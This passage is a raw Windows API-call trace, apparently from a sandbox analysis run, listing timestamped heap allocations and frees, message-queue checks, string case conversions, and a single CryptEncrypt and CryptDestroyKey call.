returned 0x249f1a0 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.600] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.600] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.600] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.600] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.600] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.601] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34e07a0*, pdwDataLen=0x8bef68*=0x172a0, dwBufLen=0x172a8 | out: pbData=0x34e07a0*, pdwDataLen=0x8bef68*=0x172a8) returned 1 [0188.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0188.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.604] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.604] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.605] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.605] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.605] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.605] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.606] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.606] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.606] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.615] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.615] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.615] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.620] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0188.620] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.620] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0188.620] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.620] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.620] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.620] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.621] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.621] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.621] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.621] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.623] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: 